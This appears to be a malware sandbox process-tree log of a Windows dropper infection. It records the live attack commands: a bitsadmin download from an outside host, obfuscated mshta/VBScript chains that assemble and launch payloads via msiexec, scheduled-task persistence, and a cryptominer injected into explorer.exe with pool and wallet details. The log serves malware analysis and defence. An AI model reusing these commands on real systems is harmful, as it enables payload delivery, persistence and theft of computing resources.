C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:3424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Modifies registry class
PID:6268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵PID:6936
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z12⤵
- Download via BitsAdmin
PID:5052 -
C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe"C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe" /VERYSILENT9⤵PID:4608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13f11af06b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exeThu13f11af06b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exeC:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exe6⤵
- Executes dropped EXE
PID:4016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13a8cbc236137c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13a8cbc236137c.exeThu13a8cbc236137c.exe5⤵
- Executes dropped EXE
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6100 -s 17048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1220 -
C:\Users\Admin\AppData\Roaming\2952917.exe"C:\Users\Admin\AppData\Roaming\2952917.exe"8⤵
- Executes dropped EXE
PID:4376 -
C:\Users\Admin\AppData\Roaming\6590434.exe"C:\Users\Admin\AppData\Roaming\6590434.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3196 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
PID:6492 -
C:\Users\Admin\AppData\Roaming\4934134.exe"C:\Users\Admin\AppData\Roaming\4934134.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5904 -
C:\Users\Admin\AppData\Roaming\8571651.exe"C:\Users\Admin\AppData\Roaming\8571651.exe"8⤵PID:5900
-
C:\Users\Admin\AppData\Roaming\5601481.exe"C:\Users\Admin\AppData\Roaming\5601481.exe"8⤵
- Executes dropped EXE
PID:5396 -
C:\Users\Admin\AppData\Roaming\1349030.exe"C:\Users\Admin\AppData\Roaming\1349030.exe"9⤵
- Executes dropped EXE
PID:6428 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ("wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\1349030.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\1349030.exe"") do taskkill -F /IM ""%~nxP"" " ,0 , trUE) )10⤵PID:6520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\1349030.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" =="" for %P in ( "C:\Users\Admin\AppData\Roaming\1349030.exe") do taskkill -F /IM "%~nxP"11⤵PID:840
-
C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X12⤵PID:6900
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ("wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " ,0 , trUE) )13⤵PID:5588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " =="" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"14⤵PID:6980
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE( creATEoBJEct("wscRIPT.SHEll"). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " ,0 , TRUE ) )13⤵PID:5532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y &cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo14⤵PID:2508
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "15⤵
- Executes dropped EXE
PID:5552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"15⤵PID:4648
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\Ff7k4.sIo15⤵
- Loads dropped DLL
PID:2068 -
C:\Windows\SysWOW64\taskkill.exetaskkill -F /IM "1349030.exe"12⤵
- Kills process with taskkill
PID:7000 -
C:\Users\Admin\AppData\Roaming\4084537.exe"C:\Users\Admin\AppData\Roaming\4084537.exe"9⤵
- Executes dropped EXE
PID:1456 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3988 -
C:\Users\Admin\AppData\Roaming\6228380.exe"C:\Users\Admin\AppData\Roaming\6228380.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3296 -
C:\Users\Admin\AppData\Roaming\4257927.exe"C:\Users\Admin\AppData\Roaming\4257927.exe"8⤵
- Executes dropped EXE
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
PID:2852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 2928⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:6720
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:5480 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:3540
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:5596 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:6336
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:6432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:6840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:5340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:5256
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
PID:4072 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4520 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 1968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"7⤵
- Executes dropped EXE
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5144 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:6104 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--yry0yD"9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3540 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffd409cdec0,0x7ffd409cded0,0x7ffd409cdee010⤵
- Loads dropped DLL
PID:6100 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:210⤵
- Loads dropped DLL
PID:6424 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=1932 /prefetch:810⤵
- Loads dropped DLL
PID:1420 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:110⤵PID:6660
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2704 /prefetch:110⤵PID:948
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3012 /prefetch:810⤵PID:2228
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2572 /prefetch:810⤵PID:5744
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:210⤵PID:6268
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3800 /prefetch:810⤵PID:1644
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3256 /prefetch:810⤵PID:4872
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2120 /prefetch:810⤵PID:2640
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2132 /prefetch:810⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5880 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5880 -s 22768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6128 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6128 -s 22328⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:1704
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:6156
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:6796
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
PID:4380 -
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:6048
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:6524
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:2516
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:5132
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:5204
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:4316
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13559beef6a5272.exe4⤵PID:3276
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13559beef6a5272.exeThu13559beef6a5272.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2520 -
C:\Users\Admin\AppData\Roaming\6490120.exe"C:\Users\Admin\AppData\Roaming\6490120.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920 -
C:\Users\Admin\AppData\Roaming\6872999.exe"C:\Users\Admin\AppData\Roaming\6872999.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416 -
C:\Users\Admin\AppData\Roaming\7127782.exe"C:\Users\Admin\AppData\Roaming\7127782.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5464 -
C:\Users\Admin\AppData\Roaming\4187297.exe"C:\Users\Admin\AppData\Roaming\4187297.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540 -
C:\Users\Admin\AppData\Roaming\3343953.exe"C:\Users\Admin\AppData\Roaming\3343953.exe"6⤵PID:5928
-
C:\Users\Admin\AppData\Roaming\719524.exe"C:\Users\Admin\AppData\Roaming\719524.exe"7⤵PID:6244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5932 -
C:\Users\Admin\AppData\Roaming\2059768.exe"C:\Users\Admin\AppData\Roaming\2059768.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13045a98310.exe4⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13045a98310.exeThu13045a98310.exe5⤵
- Executes dropped EXE
PID:1772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 3006⤵
- Program crash
PID:6152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu133bd09ec4755.exe4⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exeThu133bd09ec4755.exe5⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe"C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu133bd09ec4755.exe" -u6⤵
- Executes dropped EXE
PID:5140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13fba7be709523c0e.exe4⤵PID:836
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exeThu13fba7be709523c0e.exe5⤵
- Executes dropped EXE
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-LIPPQ.tmp\Thu13fba7be709523c0e.tmp" /SL5="$1021C,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13fba7be709523c0e.exe"6⤵
- Executes dropped EXE
PID:2796 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu131398a3143fefd0.exe4⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exeThu131398a3143fefd0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 18926⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
